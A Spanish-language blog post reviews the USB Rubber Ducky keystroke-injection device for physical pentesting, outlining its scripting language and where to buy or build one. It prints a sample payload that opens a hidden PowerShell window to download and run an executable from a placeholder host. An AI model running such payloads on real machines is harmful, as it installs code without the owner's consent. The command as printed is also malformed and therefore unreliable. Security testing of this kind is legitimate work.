viernes, 17 de marzo de 2017

USB Rubber Ducky, un teclado malicioso para pruebas de pentesting físico

Hace una semana me llegó a casa mi nuevo USB Rubber Ducky y estos días he estado jugando un poco con él, a continuación os explicaré mis impresiones y os diré cosas que tener en cuenta a la hora de usarlo así como donde comprarlo y os liberaré unos cuando payloads para poder hacer pruebas con el. 


Este USB simula ser un teclado así, los PC's lo reconocerán como un dispositivo de confianza y así poder aplicar payloads sin ningún tipo de sospecha del ordenador en cuestión. Usa un lenguaje propio muy sencillo de comprender. Entre sus características encontramos:
  • Es exactamente igual que una unidad USB Flashdrive lo que hace confiar al usuario a la hora de realizar la ingeniería social
  • Viene con un lector de tarjetas SD para poder cargar los payloads 
  • Escribe 1000 palaras por segundo lo que hará que en poco más de 6 segundos tengamos toda la información de un PC en el simple gesto de enchufar desenchufar 
  • Viene con un led que nos avisa si el Payload esta bien configurado para funcionar o por el contrario tendremos que agregar más argumentos para hacerlo funcional
  • Tiene un botón para cargar los Payloads por si con el simple gesto de enchfa y desenchufar no basta 
Una cosa también importante es el hecho de que viene con una tarjeta micro SD de 128 MB para poder cargar los payloads, tamaño más que suficiente si lo único que queremos es cargar la información de el PC (siempre que no sea demasiado grande) en el caso contrario deberíamos agregarle otra tarjeta de más tamaño.

Su lenguaje como he dicho es la mar de sencillo, con estos sencillos comandos podremos utilizarlo para lo que queramos:
  • DEFAULT_DELAY o DEFAULTDELAY, esto es para definir los milisegundos que tardará en ejecutar las órdenes
  • DELAY, lo mismo pero personalizado 
  • STRING
  • Y por última las keys especiales para cada sistema, para ello deberemos conocer los comandos del terminal del sistema en cuestión. 
Aquí os mostraré un ejemplo de como descargar y ejecutar un archivo al azar:

GUI R 
DELAY 100
STRING powershell -windowstyle hidden
(new-object
System.Net.Web.client).DownloadFile('http://example.com/bob.old',%TEMP%\bob.exe;Start-Process
"%TEMP%/bob.exe"
ENTER

Así es como lo haríamos, a continuación os pondré un series de Payloads preconfigurados para que podáis jugar con vuestros Rubber Ducky.
Y para finalizar os mostraré donde comprar un USB Rubber Ducky

->  https://hakshop.com/products/usb-rubber-ducky-deluxe

Y por si no queréis pagar semejante burrada por un Rubber Ducky aquí os dejo un post antiguo donde explico como montarlo tu mismo por 3$

-> http://www.jarlinx.com/2017/01/como-montar-un-usb-rubber-ducky-por-3.html 

___________________________________________________________________

Fuentes
___________________________________________________________________

http://picateshackz.com/2016/02/list-of-top-rubber-ducky-usb-payloads.html